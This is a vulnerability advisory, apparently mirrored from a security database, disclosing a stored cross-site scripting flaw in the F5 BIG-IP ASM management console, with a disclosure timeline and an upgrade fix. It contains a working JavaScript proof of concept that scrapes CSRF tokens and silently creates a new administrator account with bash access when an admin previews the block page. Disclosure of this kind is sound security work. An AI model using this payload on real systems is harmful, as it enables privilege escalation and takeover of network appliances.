Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31611
HistoryJan 14, 2015 - 12:00 a.m.

[Corrected] Stored XSS Vulnerability in F5 BIG-IP Application Security Manager

2015-01-1400:00:00
vulners.com
28
JSON

Edit: Corrected the date in the timeline from 01/12/14 to 01/12/15.

Details

Product: F5 BIG-IP Application Security Manager (ASM)
Vulnerability: Cross Site Scripting
Author: Peter Lapp, [email protected]
CVE: None assigned
Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Likely 11.4.x-11.5.x.
Fixed Version: 11.6

Summary

The F5 ASM is a web application firewall designed to protect web
applications from attacks. It allows for a custom HTML page to be
displayed to end users when they trigger a violation. The
configuration page for the custom response contains a text input for
HTML and a "Show" button that allows the editor to preview the page.
This functionality is vulnerable to Cross Site Scripting.

Technical Details and POC

The HTML entered into the "Response Body" area is not sandboxed, which
allows a malicious user to include JavaScript that would run in the
context of the management console whenever a user clicks the "Show"
button. The user could use XHR to bypass CSRF protections and perform
commands on behalf of anyone that clicks the "Show" button.

Scenario:

  1. A restricted user (Application Security Editor role) logs into the
    management console of the ASM, enters Javascript to add a new user
    (see below) into the "Response Body" input, and saves the page.

  2. An admin logs on and previews the block page via the "Show" button.

  3. The JS runs in the background, executes the XHR, and adds a new
    admin user. The restricted user now has an admin account.

POC (Sloppy, I know):
<script>
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange=
function()
{
if (xmlhttp.readyState==4)
{
var postrequest = new XMLHttpRequest();
xmlForm = xmlhttp.responseXML.getElementById('myform');
var timenowvalue = encodeURIComponent(xmlForm.elements['_timenow'].value);
var timebeforevalue =
encodeURIComponent(xmlForm.elements['_timenow_before'].value);
var bufvalue = encodeURIComponent(xmlForm.elements['_bufvalue'].value);
var bufvaluebefore =
encodeURIComponent(xmlForm.elements['_bufvalue_before'].value);
var parameters =
"_timenow="+timenowvalue+"&_timenow_before="+timebeforevalue+"&_bufvalue="+bufvalue+"&_bufvalue_before="+bufvaluebefore+"&form_holder_opener=&handler=%2Ftmui%2Fsystem%2Fuser%2Fcreate&handler_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&showObjList=shell_with_bash&showObjList_before=&hideObjList=partition_row%2Cshell_no_bash&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Fuser%2Fcreate&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&linked_add_id=&linked_add_id_before=&exit_page=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&exit_page_before=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&user_role_before=900&user_role_before_before=900&form_page=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&name=testadmin&name_before=&name_validation=NO_VALIDATION&name_required=1&passwd=testing123&passwd_before=&passwd_validation=com.f5.form.PasswordValidator&passwd_validationparam1=passwd_confirm&passwd_required=1&passwd_confirm=testing123&passwd_confirm_before=&passwd_confirm_validation=NO_VALIDATION&passwd_confirm_required=1&user_role=0&user_role_before=900&shell_with_bash=bash&shell_with_bash_before=disable&exit_button_before=Cancel&repeat_before=Repeat&finished=Finished&finished_before=Finished";
postrequest.open("POST", "/tmui/Control/form", true)
postrequest.setRequestHeader("Content-type",
"application/x-www-form-urlencoded")
postrequest.send(parameters)
}
}
xmlhttp.open("GET", "/tmui/Control/jspmap/tmui/system/user/create.jsp", true);
xmlhttp.responseType = "document";
xmlhttp.send();
</script>

Solution

Upgrade to 11.6.
The vendor indicated the patch would not be backported to previous versions.

Timeline

06/09/14 - Reported issue to vendor
06/18/14 - Vendor confirms the vulnerability
07/18/14 - Vendor confirms the fix will be included in 11.6 and an SOL
would be created for the vulnerability
10/24/14 - Vendor confirms the fix was included in 11.6.0 but an SOL
was not created and the fix would not be backported.
01/12/15 - Released vulnerability info.

JSON